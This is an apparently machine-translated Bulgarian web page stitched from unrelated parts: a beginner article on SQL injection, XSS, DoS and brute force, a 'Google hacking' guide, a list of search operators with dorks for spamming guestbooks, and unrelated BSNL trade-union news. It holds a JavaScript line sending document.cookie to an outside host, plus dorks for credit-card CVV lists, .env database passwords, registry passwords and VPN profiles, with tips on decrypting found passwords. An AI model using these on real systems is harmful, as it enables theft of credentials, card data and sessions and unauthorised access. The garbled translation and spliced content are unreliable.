Реших да поговорим малко за информационна сигурност. Статията ще бъде полезна за начинаещи програмисти и тези, които току-що са започнали да се занимават с Frontend разработка. Какъв е проблемът?

Много начинаещи разработчици са толкова пристрастени към писането на код, че напълно забравят за сигурността на работата си. И най-важното, те забравят за такива уязвимости като SQL заявка, XXS. Те също измислят лесни пароли за своите административни панели и са подложени на груба сила. Какви са тези атаки и как могат да бъдат избегнати?

SQL инжекция

SQL инжектирането е най-често срещаният тип атака на база данни, която се извършва с SQL заявка за конкретна СУБД. Много хора и дори големи компании страдат от подобни атаки. Причината е грешка на разработчика при писане на база данни и всъщност SQL заявки.

Атака тип SQL инжекция е възможна поради неправилна обработка на входни данни, използвани в SQL заявки. При успешна атака от хакер рискувате да загубите не само съдържанието на базите данни, но и съответно паролите и логовете на административния панел. И тези данни ще бъдат напълно достатъчни, за да превземете напълно сайта или да направите необратими корекции в него.

Атаката може да бъде успешно възпроизведена в скриптове, написани на PHP, ASP, Perl и други езици. Успехът на такива атаки зависи повече от това коя СУБД се използва и как се реализира самият сценарий. В света има много уязвими сайтове за SQL инжекции. Това е лесно да се провери. Достатъчно е да въведете "dorks" - това са специални заявки за намиране на уязвими сайтове. Ето някои от тях:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Как да ги използваме? Достатъчно е да ги въведете Google търсачкаили Yandex. Търсачката ще ви даде не само уязвим сайт, но и страница за тази уязвимост. Но няма да спрем дотук и ще се уверим, че страницата наистина е уязвима. За целта е достатъчно да поставите единични кавички „‘“ след стойността „id=1“. Нещо като това:

  • inurl:games.php?id=1'

И сайтът ще ни даде грешка относно SQL заявката. От какво се нуждае нашият хакер след това?

И тогава му трябва точно тази връзка към страницата с грешка. След това работата по уязвимостта в повечето случаи се извършва в дистрибуцията "Kali linux" с нейните помощни програми за тази част: въвеждане на кода за инжектиране и извършване на необходимите операции. Как ще стане това, не мога да ви кажа. Но можете да намерите информация за това в Интернет.

XSS атака

Този тип атака се извършва върху бисквитки. Те от своя страна много обичат да спестяват потребители. Защо не? Как без тях? В края на краищата, благодарение на бисквитките, ние не въвеждаме парола от Vk.com или Mail.ru сто пъти. И малко са тези, които им отказват. Но в интернет често се появява правило за хакерите: коефициентът на удобство е право пропорционален на коефициента на несигурност.

За да реализира XSS атака, нашият хакер се нуждае от познания за JavaScript. Езикът на пръв поглед е много прост и безвреден, защото няма достъп до компютърни ресурси. Хакерът може да работи с JavaScript само в браузър, но това е достатъчно. В крайна сметка основното е да въведете кода в уеб страницата.

Няма да навлизам в подробности за процеса на атака. Ще кажа само основното и значението на това как се случва това.

Хакер може да добави JS код към някой форум или книга за гости:

Скриптовете ни пренасочват към заразена страница, където кодът ще бъде изпълнен: било то снифър, някакъв вид хранилище или експлойт, който по някакъв начин ще открадне нашите бисквитки от кеша.

Защо JavaScript? Тъй като JavaScript е страхотен с уеб заявки и има достъп до бисквитки. Но ако нашият скрипт ще ни прехвърли на някакъв сайт, тогава потребителят лесно ще забележи това. Тук хакерът използва по-хитър вариант - просто въвежда кода в картинката.

Img=новоИзображение();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

Просто създаваме изображение и му присвояваме нашия скрипт като адрес.

Как да се предпазите от всичко това? Много просто - не следвайте подозрителни връзки.

DoS и DDos атаки


DoS (от английския отказ от услуга - отказ от услуга е хакерска атака срещу компютърна система с цел да я доведе до отказ. Това е създаването на такива условия, при които добросъвестните потребители на системата нямат достъп до предоставените системни ресурси (сървъри) или този достъп е затруднен. Сривът на системата също може да бъде стъпка към нейното улавяне, ако при спешност софтуерът издаде критична информация: например версия, част програмен коди т.н. Но най-често това е мярка за икономически натиск: загуба на проста услуга, която генерира доход. Сметките от доставчика или мерките за избягване на атаката значително удрят „целта" в джоба. В момента DoS и DDoS атаките са най-популярни, тъй като ви позволяват да доведете почти всяка система до повреда, без да оставяте правно значими доказателства.

Каква е разликата между DoS и DDos атаките?

DoS е атака, изградена по интелигентен начин. Например, ако сървърът не проверява коректността на входящите пакети, тогава хакерът може да направи такава заявка, която ще бъде обработена завинаги и няма да има достатъчно процесорно време за работа с други връзки. Съответно клиентите ще получат отказ от услуга. Но няма да работи да претоварите или деактивирате големи добре познати сайтове по този начин. Те са въоръжени с доста широки канали и супер мощни сървъри, които лесно могат да се справят с такова претоварване.

DDoS всъщност е същата атака като DoS. Но ако в DoS има един пакет заявка, тогава в DDoS може да има стотици или повече от тях. Дори тежките сървъри може да не са в състояние да се справят с такова претоварване. Ще ви дам пример.

DoS атака е, когато водите разговор с някого, но след това някой невъзпитан човек идва и започва да крещи силно. Говоренето е или невъзможно, или много трудно. Решение: извикайте охрана, която ще успокои и изведе човека от стаята. DDoS атаките са, когато хиляди такива невъзпитани хора се натъкват. В този случай охраната няма да може да извие и да отведе всички.

DoS и DDoS се произвеждат от компютри, така наречените зомбита. Това са компютри на потребители, хакнати от хакери, които дори не подозират, че тяхната машина е замесена в атаката на сървър.

Как да се предпазите от това? Общо взето няма как. Но можете да усложните задачата на хакер. За да направите това, трябва да изберете добър хостинг с мощни сървъри.

Атака с груба сила

Разработчикът може да измисли много системи за защита от атаки, да прегледа напълно скриптовете, които сме написали, да провери сайта за уязвимости и т.н. Но когато се стигне до последната стъпка от оформлението на сайта, а именно когато той просто ще постави парола на админ панела, той може да забрави за едно нещо. Парола!

Силно не се препоръчва да задавате проста парола. Може да бъде 12345, 1114457, vasya111 и т.н. Не се препоръчва да задавате пароли с дължина под 10-11 знака. В противен случай може да бъдете обект на най-честата и не сложна атака - Brute Force.

Brute force е базирана на речник атака с груба сила на парола, използваща специални програми. Речниците могат да бъдат различни: латински, сортиране по числа, да речем до някакъв диапазон, смесени (латиница + цифри) и дори има речници с уникални символи @#4$%&*~~`'”\ ? и т.н.

Разбира се, този тип атака е лесна за избягване, достатъчно е да измислите сложна парола. Дори captcha може да ви спаси. И също така, ако вашият сайт е направен на CMS, тогава много от тях изчисляват подобен тип атака и блокират ip. Винаги трябва да помним, че колкото повече различни символи има в паролата, толкова по-трудно е да я разберем.

Как работят хакерите? В повечето случаи те или подозират, или вече знаят част от паролата. Съвсем логично е да се предположи, че паролата на потребителя със сигурност няма да се състои от 3 или 5 знака. Такива пароли водят до чести хакове. По принцип хакерите вземат диапазон от 5 до 10 знака и добавят там няколко знака, които вероятно знаят предварително. След това генерирайте пароли с желаните диапазони. Дистрибуцията на Kali linux дори има програми за такива случаи. И готово, атаката вече няма да продължи дълго, тъй като обемът на речника вече не е толкова голям. Освен това хакерът може да използва силата на видеокартата. Някои от тях поддържат системата CUDA, а скоростта на изброяване се увеличава до 10 пъти. И сега виждаме, че атака по такъв прост начин е съвсем реална. Но не само сайтовете са подложени на груба сила.

Уважаеми разработчици, никога не забравяйте за системата за информационна сигурност, защото днес много хора, включително държави, страдат от такива видове атаки. В крайна сметка най-голямата уязвимост е човек, който винаги може да бъде разсеян някъде или да пренебрегне някъде. Ние сме програмисти, но не сме програмирани машини. Бъдете винаги нащрек, защото загубата на информация заплашва със сериозни последствия!

Получаването на лични данни не винаги означава хакване - понякога те се публикуват в публичното пространство. Познаването на настройките на Google и малко изобретателност ще ви позволят да намерите много интересни неща - от номера на кредитни карти до документи на ФБР.

ВНИМАНИЕ

Цялата информация е предоставена само за информационни цели. Нито редакторите, нито авторът носят отговорност за възможни вреди, причинени от материалите на тази статия.

Днес всичко е свързано с интернет, като ограничаването на достъпа не се интересува много. Поради това много лични данни стават плячка на търсачките. Роботите Spider вече не се ограничават до уеб страници, а индексират цялото налично съдържание в мрежата и постоянно добавят поверителна информация към своите бази данни. Научаването на тези тайни е лесно - просто трябва да знаете как да попитате за тях.

Търсене на файлове

В способни ръце Google бързо ще намери всичко, което е лошо в мрежата, като лична информация и файлове за служебна употреба. Те често са скрити като ключ под килим: няма реални ограничения за достъп, данните просто се намират в задната част на сайта, където връзките не водят. Стандартният уеб интерфейс на Google предоставя само основни настройки за разширено търсене, но дори и те ще бъдат достатъчни.

Има два оператора, които можете да използвате, за да ограничите търсенето с Google до файлове от определен тип: filetype и ext. Първият задава формата, който търсачката определя от заглавката на файла, вторият - разширението на файла, независимо от вътрешното му съдържание. При търсене и в двата случая трябва да посочите само разширението. Първоначално операторът ext беше удобен за използване в случаите, когато нямаше специфични характеристики на формата за файла (например за търсене на ini и cfg конфигурационни файлове, вътре в които може да има всичко). Сега алгоритмите на Google са променени и няма видима разлика между операторите - резултатите са едни и същи в повечето случаи.


Филтриране на изхода

По подразбиране Google търси думи и като цяло всички знаци, въведени във всички файлове на индексираните страници. Можете да ограничите обхвата на търсене от домейна от първо ниво, конкретен сайт или от местоположението на желаната последователност в самите файлове. За първите две опции се използва изявлението site, последвано от името на домейна или избрания сайт. В третия случай цял набор от оператори ви позволява да търсите информация в служебни полета и метаданни. Например allinurl ще намери указаното в тялото на самите връзки, allinanchor - в текста, предоставен с маркера , allintitle - в заглавките на страницата, allintext - в тялото на страниците.

За всеки оператор има по-лека версия с по-кратко име (без префикса all). Разликата е, че allinurl ще намери връзки с всички думи, докато inurl ще намери връзки само с първата от тях. Втората и следващите думи от заявката могат да се появят навсякъде в уеб страниците. Операторът inurl също се различава от друг подобен по значение сайт. Първият също ви позволява да намерите произволна последователност от знаци във връзката към желания документ (например /cgi-bin/), който се използва широко за намиране на компоненти с известни уязвимости.

Нека да го опитаме на практика. Взимаме филтъра allintext и правим заявката да върне списък с номера на кредитни карти и кодове за потвърждение, които ще изтекат само след две години (или когато собствениците им се уморят да хранят всички подред).

Allintext: дата на изтичане на номера на картата /2017 cvv

Когато прочетете по новините, че млад хакер е "хакнал сървърите" на Пентагона или НАСА, крадейки класифицирана информация, тогава в повечето случаи това е именно тази елементарна техника на използване на Google. Да предположим, че се интересуваме от списък със служители на НАСА и техните данни за контакт. Със сигурност такъв списък е в електронен вид. За удобство или поради недоглеждане може да лежи и на самия уебсайт на организацията. Логично е, че в този случай няма да има препратки към него, тъй като е предназначен за вътрешно ползване. Какви думи могат да бъдат в такъв файл? Най-малко - полето "адрес". Лесно е да проверите всички тези предположения.


inurl:nasa.gov filetype:xlsx "адрес"


Използваме бюрокрация

Такива находки са приятна дреболия. Наистина солидният улов идва от по-подробно познаване на Google Webmaster Operators, самата мрежа и структурата на това, което търсите. Познавайки подробностите, можете лесно да филтрирате изхода и да прецизирате свойствата на файловете, от които се нуждаете, за да получите наистина ценни данни в останалите. Смешно е, че тук на помощ идва бюрокрацията. Той произвежда типични формулировки, които правят удобно търсенето на секретна информация, която случайно е изтекла в мрежата.

Например декларацията за разпространение, която е задължителна в офиса на Министерството на отбраната на САЩ, означава стандартизирани ограничения върху разпространението на документ. Буквата А отбелязва публични издания, в които няма нищо тайно; B - предназначени само за вътрешно ползване, C - строго поверително и така нататък до F. Отделно има буквата X, която обозначава особено ценна информация, представляваща държавна тайна от най-високо ниво. Нека онези, които трябва да го правят на служба, да търсят такива документи, а ние ще се ограничим до файлове с буквата C. Според DoDI 5230.24 такава маркировка се присвоява на документи, съдържащи описание на критични технологии, които попадат под експортен контрол. Можете да намерите такава внимателно пазена информация на сайтове в домейна от първо ниво .mil, предоставен на американската армия.

„ИЗЯВЛЕНИЕ ЗА РАЗПРОСТРАНЕНИЕ C“ inurl:navy.mil

Много е удобно, че в домейна .mil се събират само сайтове от Министерството на отбраната на САЩ и неговите договорни организации. Резултатите от търсене с ограничен домейн са изключително чисти и заглавията говорят сами за себе си. На практика е безполезно да се търсят руски тайни по този начин: в домейните .ru и .rf цари хаос, а имената на много оръжейни системи звучат като ботанически (PP "Kiparis", самоходни оръдия "Acacia") или дори приказно (TOS "Пинокио").


Чрез внимателно разглеждане на всеки документ от сайт в домейна .mil можете да видите други маркери, за да прецизирате търсенето си. Например препратка към ограниченията за износ "Sec 2751", която също е удобна за търсене на интересна техническа информация. От време на време той се премахва от официалните сайтове, където някога се е появил, така че ако не можете да следвате интересна връзка в резултатите от търсенето, използвайте кеша на Google (кеш оператор) или уебсайта на Интернет архива.

Изкачваме се в облаците

В допълнение към случайно разсекретени документи от държавни служби, връзки към лични файлове от Dropbox и други услуги за съхранение на данни, които създават „частни“ връзки към публично публикувани данни, понякога изскачат в кеша на Google. Още по-зле е с алтернативните и самоделни услуги. Например следната заявка намира данните на всички клиенти на Verizon, които имат инсталиран FTP сървър и активно използват рутер на своя рутер.

Allinurl:ftp://verizon.net

Сега има повече от четиридесет хиляди такива умни хора, а през пролетта на 2015 г. имаше порядък повече. Вместо Verizon.net можете да замените името на всеки известен доставчик и колкото по-известен е той, толкова по-голяма може да бъде уловката. Чрез вградения FTP сървър можете да видите файлове на външно устройство, свързано към рутера. Обикновено това е NAS за отдалечена работа, личен облак или някакъв вид peer-to-peer изтегляне на файлове. Цялото съдържание на такива медии се индексира от Google и други търсачки, така че можете да получите достъп до файлове, съхранявани на външни устройства, чрез директна връзка.

Надникване на конфигурации

Преди миграцията на едро към облаците, простите FTP сървъри, на които също липсваха уязвимости, управляваха като отдалечени хранилища. Много от тях са актуални и днес. Например популярната програма WS_FTP Professional съхранява данни за конфигурация, потребителски акаунти и пароли във файла ws_ftp.ini. Той е лесен за намиране и четене, тъй като всички записи се съхраняват в обикновен текст, а паролите са криптирани с помощта на алгоритъма Triple DES с минимално обфускация. В повечето версии просто изхвърлянето на първия байт е достатъчно.

Дешифрирането на такива пароли е лесно с помощта на помощната програма WS_FTP Password Decryptor или безплатна уеб услуга.

Когато говорим за хакване на произволен сайт, те обикновено имат предвид получаване на парола от регистрационни файлове и резервни копия на конфигурационните файлове на CMS или приложението за електронна търговия. Ако знаете типичната им структура, лесно можете да посочите ключови думи. Редове като тези в ws_ftp.ini са изключително често срещани. Например Drupal и PrestaShop винаги имат потребителско име (UID) и съответстваща парола (pwd), а цялата информация се съхранява във файлове с разширение .inc. Можете да ги търсите така:

"pwd=" "UID=" ext:inc

Разкриваме пароли от СУБД

В конфигурационните файлове на SQL сървърите потребителските имена и имейл адресите се съхраняват в чист текст, а вместо пароли се записват техните MD5 хешове. Дешифрирането им, строго погледнато, е невъзможно, но можете да намерите съвпадение сред известни двойки хеш-парола.

Досега има СУБД, които дори не използват хеширане на пароли. Конфигурационните файлове на всеки от тях могат просто да се видят в браузъра.

Intext:DB_PASSWORD filetype:env

С появата на сървърите място за прозорциконфигурационните файлове частично заемаха системния регистър. Можете да търсите в неговите клонове по абсолютно същия начин, като използвате reg като тип файл. Например така:

Filetype:reg HKEY_CURRENT_USER "Парола"=

Не забравяйте очевидното

Понякога е възможно да се стигне до класифицирана информация с помощта на данни, случайно отворени и уловени от Google. Идеалният вариант е да намерите списък с пароли в някакъв общ формат. Само отчаяни хора могат да съхраняват информация за акаунта в текстов файл, документ на Word или електронна таблица на Excel, но винаги има достатъчно от тях.

Тип файл:xls inurl:парола

От една страна, има много средства за предотвратяване на подобни инциденти. Необходимо е да посочите адекватни права за достъп в htaccess, да закърпите CMS, да не използвате леви скриптове и да затворите други дупки. Има и файл със списък за изключване robots.txt, който забранява на търсачките да индексират посочените в него файлове и директории. От друга страна, ако структурата на robots.txt на някой сървър се различава от стандартната, тогава веднага става ясно какво се опитват да скрият в него.

Списъкът с директории и файлове на всеки сайт се предхожда от стандартния индекс на надпис на. Тъй като трябва да се появи в заглавието за целите на услугата, има смисъл да се ограничи търсенето му до оператора intitle. Интересни неща могат да бъдат намерени в директориите /admin/, /personal/, /etc/ и дори /secret/.

Следете актуализациите

Уместността тук е изключително важна: старите уязвимости се затварят много бавно, но Google и неговите резултати от търсене непрекъснато се променят. Има дори разлика между филтъра "последната секунда" (&tbs=qdr:s в края на url адреса на заявката) и филтъра "в реално време" (&tbs=qdr:1).

Интервалът от време на последната дата на актуализиране на файла от Google също е имплицитно посочен. Чрез графичния уеб интерфейс можете да изберете един от типичните периоди (час, ден, седмица и т.н.) или да зададете период от време, но този метод не е подходящ за автоматизация.

По вид адресна лентаможе само да се гадае за начин за ограничаване на извеждането на резултати с помощта на конструкцията &tbs=qdr:. Буквата y след нея указва ограничение от една година (&tbs=qdr:y), m показва резултатите за последния месец, w за седмицата, d за последния ден, h за последния час, n за минутата, и s за дай ми секунда. Най-новите резултати, които току-що станаха известни на Google, се намират с помощта на филтъра &tbs=qdr:1.

Ако трябва да напишете труден скрипт, ще бъде полезно да знаете, че диапазонът от дати е зададен в Google в юлиански формат чрез оператора daterange. Например, ето как можете да намерите списъка PDF документис думата поверително, качени от 1 януари до 1 юли 2015 г.

Поверителен файлов тип:pdf диапазон от дати:2457024-2457205

Диапазонът е посочен в юлиански формат на дата без десетични знаци. Неудобно е да ги превеждате ръчно от григорианския календар. По-лесно е да използвате конвертор на дата.

Отново насочване и филтриране

В допълнение към посочването на допълнителни оператори в заявката за търсене, те могат да бъдат изпратени директно в тялото на връзката. Например, характеристиката filetype:pdf съответства на конструкцията as_filetype=pdf. По този начин е удобно да задавате всякакви пояснения. Да кажем, че извеждането на резултати само от Република Хондурас е зададено чрез добавяне на конструкцията cr=countryHN към URL адреса за търсене, но само от град Бобруйск - gcs=Бобруйск. Вижте раздела за разработчици за пълен списък на .

Инструментите за автоматизация на Google са предназначени да улеснят живота, но често допринасят за караницата. Например градът на даден потребител се определя от IP адреса на потребителя чрез WHOIS. Въз основа на тази информация Google не само балансира натоварването между сървърите, но и променя резултатите от търсенето. В зависимост от региона, за една и съща заявка, различни резултати ще стигнат до първата страница и някои от тях може да се окажат напълно скрити. Чувствайте се като космополит и търсете информация от която и да е страна ще ви помогне нейният двубуквен код след директивата gl=country. Например кодът за Холандия е NL, докато Ватикана и Северна Корея нямат собствен код в Google.

Често резултатите от търсенето са разпръснати дори след използване на няколко разширени филтъра. В този случай е лесно да прецизирате заявката, като добавите няколко думи за изключение към нея (всяка от тях е предшествана от знак минус). Например, banking, names и tutorial често се използват с думата Personal. Следователно по-чистите резултати от търсенето ще показват не учебникарски пример за заявка, а прецизирана:

Заглавие:"Индекс на /лични/" -имена -урок -банкиране

Последен пример

Усъвършенстваният хакер се отличава с това, че сам си осигурява всичко необходимо. Например VPN е удобно нещо, но или скъпо, или временно и с ограничения. Да се ​​регистрирате само за себе си е твърде скъпо. Хубаво е, че има групови абонаменти, а с помощта на Google лесно ставаш част от група. За да направите това, просто намерете конфигурационния файл на Cisco VPN, който има доста нестандартно PCF разширение и разпознаваем път: Program Files\Cisco Systems\VPN Client\Profiles . Една заявка и вие се присъединявате например към любезния персонал на университета в Бон.

Тип файл: pcf vpn ИЛИ Група

ИНФО

Google намира конфигурационни файлове с пароли, но много от тях са криптирани или заменени с хешове. Ако видите низове с фиксирана дължина, веднага потърсете услуга за дешифриране.

Паролите се съхраняват в криптирана форма, но Морис Масард вече е написал програма за дешифрирането им и я предоставя безплатно чрез thecampusgeeks.com.

При Помощ от Googleизвършват се стотици различни видове атаки и тестове за проникване. Има много опции, засягащи популярни програми, основни формати на бази данни, множество PHP уязвимости, облаци и т.н. Знаейки точно какво търсите, ви е много по-лесно да получите информацията, от която се нуждаете (особено информацията, която не сте възнамерявали да направите публично достояние). Не само Shodan дава интересни идеи, но и всяка база данни с индексирани мрежови ресурси!

Как да търсите с помощта на google.com

Вероятно всеки знае как да използва това търсачка, като Google =) Но не всеки знае, че ако правилно съставите заявка за търсене, използвайки специални структури, можете да постигнете резултатите от това, което търсите, много по-ефективно и по-бързо =) В тази статия ще се опитам да покажа какво и как трябва да направите, за да търсите правилно

Google поддържа няколко оператора за разширено търсене, които имат специално значение при търсене в google.com. Обикновено тези оператори променят търсенето или дори казват на Google да извършва напълно различни видове търсения. Например дизайнът връзка:е специален оператор, а заявката връзка: www.google.comняма да ви даде нормално търсене, а вместо това ще намери всички уеб страници, които имат връзки към google.com.
алтернативни видове заявки

кеш:Ако включите други думи в заявката, Google ще маркира тези включени думи в кеширания документ.
Например, кеш:www.уеб сайтще покаже кеширано съдържание с подчертана дума "уеб".

връзка:горната заявка за търсене ще покаже уеб страници, които съдържат връзки към посочената заявка.
Например: връзка: www.websiteще покаже всички страници, които имат връзка към http://www.site

свързани:Показва уеб страници, които са „свързани“ с посочената уеб страница.
Например, свързани: www.google.comще покаже уеб страници, които са подобни на началната страница на Google.

информация:Искане на информация: ще предостави информация, която Google има за исканата уеб страница.
Например, информация: уебсайтще покаже информация за нашия форум =) (Армада - Форум на възрастни уеб администратори).

Други искания за информация

дефинирам:Заявката define: ще предостави дефиниция на думите, които въвеждате след това, събрана от различни онлайн източници. Дефиницията ще бъде за цялата въведена фраза (т.е. ще включва всички думи в точната заявка).

запаси:Ако започнете заявка с акции: Google ще обработи останалите термини на заявката като борсови тикери и ще направи връзка към страница, показваща подготвената информация за тези знаци.
Например, акции: intel yahooще покаже информация за Intel и Yahoo. (Имайте предвид, че трябва да отпечатате знаци за извънредни новини, а не името на компанията)

Модификатори на заявки

сайт:Ако включите site: в заявката си, Google ще ограничи резултатите до уебсайтовете, които намери в този домейн.
Можете също да търсите отделни зони, като ru, org, com и т.н. сайт:com сайт: ru)

allintitle:Ако стартирате заявка с allintitle:, Google ще ограничи резултатите с всички думи на заявката в заглавието.
Например, allintitle: търсене в Googleще върне всички страници за търсене в Google като изображения, блог и т.н

заглавие:Ако включите intitle: в заявката си, Google ще ограничи резултатите до документи, съдържащи тази дума в заглавието.
Например, заглавие: Бизнес

allinurl:Ако стартирате заявка с allinurl: Google ще ограничи резултатите с всички думи на заявката в URL адреса.
Например, allinurl: търсене в Googleще върне документи с google и търсене в заглавието. Освен това, като опция, можете да разделяте думите с наклонена черта (/), след което думите от двете страни на наклонената черта ще бъдат търсени в една и съща страница: Пример allinurl: foo/бар

inurl:Ако включите inurl: в заявката си, Google ще ограничи резултатите до документи, съдържащи тази дума в URL адреса.
Например, Анимация inurl:уебсайт

текст:търси само в текста на страницата за посочената дума, игнорира заглавието и текстовете на връзките и други неща, които не са свързани с. Има и производно на този модификатор - allintext:тези. освен това, всички думи в заявката ще бъдат търсени само в текста, което също е важно, като се игнорират често използвани думи във връзките
Например, intext:форум

период от време:търси във времеви рамки (диапазон от дати: 2452389-2452389), датите за време са посочени в юлиански формат.

Е, и всякакви интересни примери за заявки

Примери за компилиране на заявки за Google. За спамъри

inurl:control.guest?a=знак

Site:books.dreambook.com „URL адрес на началната страница“ „Подпишете моя“ inurl:sign

Сайт: www.freegb.net Начална страница

Inurl:sign.asp "Брой знаци"

„Съобщение:“ inurl:sign.cfm „Подател:“

inurl:register.php „Регистрация на потребител“ „Уебсайт“

Inurl:edu/guestbook „Подпишете се в книгата за гости“

Inurl:post "Публикуване на коментар" "URL"

Inurl:/archives/ „Коментари:“ „Запомняте ли информация?“

„Сценарий и книга за гости, създадени от:“ „URL:“ „Коментари:“

inurl:?action=add “phpBook” “URL”

Заглавие: „Изпратете нова история“

Списания

inurl:www.livejournal.com/users/mode=reply

inurl greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

inurl:fastbb.ru /re.pl? "Книга за гости"

Блогове

Inurl:blogger.com/comment.g?”postID”"анонимен"

Inurl:typepad.com/ „Публикувайте коментар“ „Запомняте ли лична информация?“

Inurl:greatestjournal.com/community/ „Публикуване на коментар“ „адреси на анонимни плакати“

„Публикуване на коментар“ „адреси на анонимни плакати“ -

Заглавие: "Публикуване на коментар"

Inurl:pirillo.com „Публикуване на коментар“

Форуми

Inurl:gate.html?”name=Forums” “mode=reply”

inurl:”forum/posting.php?mode=reply”

inurl:"mes.php?"

inurl:”members.html”

inurl:forum/memberlist.php?“

Съобщенията са актуализирани през месец януари 2020 г

16-01-2020

Съболезнователно съобщение

SNEA изразява дълбока скръб за смъртта на

Лидер ветеран

Com К. Вишванатан

CHQ Ковчежник на JETA/JTOA (3 пъти)

19/11, D block Nandhini flats church road, Chrompet Chennai 44,


15-01-2020

15-01-2020

15-01-2020

Важен пробив за услугата Triple Play FTTH чрез BSNL:

Отворена политика за предоставяне на IPTV: Дългоочакваната Политика за предоставяне на IPTV услуги чрез BSNL FTTH от доставчици/партньори на съдържание е издадена от BSNL CO.

Това начинание се рекламира като отговор на BSNLs на големи частни играчи, предоставящи услуги Triple Play--

Чрез този проект BSNL ще осигури Истинска Triple Play услуга за клиенти, защото тук гледането на телевизия няма да консумира интернет данни.

Това ще бъде един основен спасителен пояс за възраждането на BSNL.

Това начинание вече е успешно разработено и внедрено частно от LCO/TIP в Thrissur BA в Kerala Circle с техническата подкрепа на BSNL in house таланти, ръководени от Com Anoop KJ, JTO OMCR, Ernakulam.

Те са създали приложение за осъществяване/получаване на обаждания от стационарен телефон с помощта на мобилен телефон, използващ WiFi.

Този проект беше представен на наскоро проведената CWC среща на SNEA в Бангалор през август 2019 г.

Бяха получени различни предложения от различни кръгове за внедряване на IPTV чрез BSNL мрежа.

Липсата на IPTV (или телевизионна услуга) е идентифицирана като една от основните причини за слабата реакция към BSNL FTTH връзките от многооператорски LCOs в цялата страна.

SNEA преследва проекта на всички нива и се радваме да видим светлина в края на тунела.

Поздравяваме вътрешните таланти в BSNL, които показаха истинския си потенциал.

SNEA благодари на всички служители, които са работили за изпълнението на проекта в BSNL CO и всички офиси на Circle и особено Com. P Padmanabha Rao, нашите AGS & DGM, BSNL CO.

Отворена политика за IPTV

15-01-2020

Организационно преструктуриране: Сливане на нетериториални кръгове.

Кръговете за поддръжка и проекти са обединени и преименувани на Core Network-Transmission (Изток/Запад/Север/Юг). Отделен кръг за Североизток, а именно Регион на основната мрежа за пренос, обхващащ кръгове AS, NE I и NE II. В сила от 01.04.2020 г.

Telecom Factories се сляха със съответните териториални кръгове като ръководител на BA с 01.02.2020 г.

NCNGN Circle се сля с BBNW Circle.

Nodal Center Chandigarh се сля с Punjab Circle.

Само един кръг за обучение с централа в ALTTC, Газиабад. ALTTC, NATFM и BRBRAITT ще функционират като ръководители на BA. Само зонални RTTC в бъдеще.

Мотивационно писмоАнексур

15-01-2020


14-01-2020

GS пише на Shri P K Purwar, CMD/BSNL:

Моля, вземете незабавни мерки за Редовна промоция вместо споразумение за грижив различни степени сред ръководителите, които вече работят на по-високи нива само чрез промяна на дизайназа запълване на огромния вакуум, създаден в полевите единици от VRS 2019 и за мотивиране на ръководителите да поемат допълнително работно натоварване:

Според наличните данни към 01.02.2020 г.

i) Само 57 DGM(T) ще бъдат налични срещу разрешената сила от 1481.

ii) Само 32 DGM(Fin) ще бъдат налични срещу разрешената сила от 402.

iii) Само 1746 AGM(T) ще бъдат налични в BSNL вместо 6500 AGM, работещи една година назад. При промоцията на DGM броят на AGM ще бъде около 1200, по-малко от 20%. SDE с 15 години стаж чакат повишение.

iv) Само 70 CAO ще бъдат налични срещу санкционираната сила от 1347. Те няма да са достатъчни дори за човекътсвободни длъжности DGM(Fin).

v) Хиляди ръководители в по-високи нива работят в еквивалентни степени на JTO, SDE от 5 до 30 години и чакат повишение. JTOs, наети от 1988 г., чакат повишение в крилото Arch. Хиляди партиди JTO от 1999, 2001 до 2008, 2010, 2013 и т.н. чакат първата си промоция. Състоянието на крилото JTO (Civil/Elect/TF) е също толкова лошо.

Ние напълно се противопоставяме на преобладаващата грижа след споразумението, следвано от ръководството, вместо редовно повишение. Ръководителите вече работят в по-високи нива и могат редовно да бъдат повишавани в по-високи степени само чрез промяна на назначението, вместо споразумение в LA.

GS писмо до CMD

11-01-2020

Среща с Шри Арвинд Ваднеркар, DIR(HR) на 01.09.2020 г.: GS, президентът и двамата AGS се срещнаха с DIR(HR) в присъствието на Sr GM(Pers & Estt), GM(SR), GM(Restg), GM(Admn) и GMs(Pers) и проведоха дискусии по следните въпроси:

Щатни норми и преструктуриране на BSNL: Обяснихме, че временният норматив за персонал, издаден от клетката Restg, изобщо не е приложим, тъй като реалностите на място не се вземат предвид от ръководството. Според временните норми някои SSA, ръководени от GM днес, трябва да бъдат ръководени от SDE в бъдеще. Ще има голям брой малки SSA с огромни географски области, където само един или двама ръководители ще бъдат оправдани. На практика ще бъде невъзможно да се поддържат услугите в тези райони. Чрез аутсорсинг ролята и отговорността на ръководителите няма да бъдат намалени особено в CFA сегмента. В селските райони обединяването на цялата работа на Transmission, BTS mtce, EB, поддръжка на кабели със SDE(Group) с огромни площи ще победи самата цел. По същия начин нормите за градските райони също са строги. Така че временните норми трябва незабавно да бъдат преработени. В противен случай никой няма да излезе да работи във външния завод и Trans mtce, а тези, които работят, също ще поискат командироване на закрито, мобилно и т.н. По същия начин заместителите не са отбелязани в много SSA за гладко поглъщане на 31.01.2020 г. Директорът и GM(Restg) обясниха, че това са само временни норми, които могат да бъдат преразгледани. Поискахме незабавен преглед.

Допълнително обяснихме искането от полевите звена поддръжката на първичния кабел също да бъде включена в търга за аутсорсинг. Сред наличните ТТ много малко имат познания за свързване на кабели и те не са достатъчни за поддръжка на всички първични кабели. Други са необходими за поддръжка на закрито/MDF/електрическа централа. Тези факти са обяснени на срещата с DIR(CFA), но досега не са взети благоприятни решения. DIR(HR) гарантира, че ще постави този важен въпрос отново на вниманието на DIR(CFA).

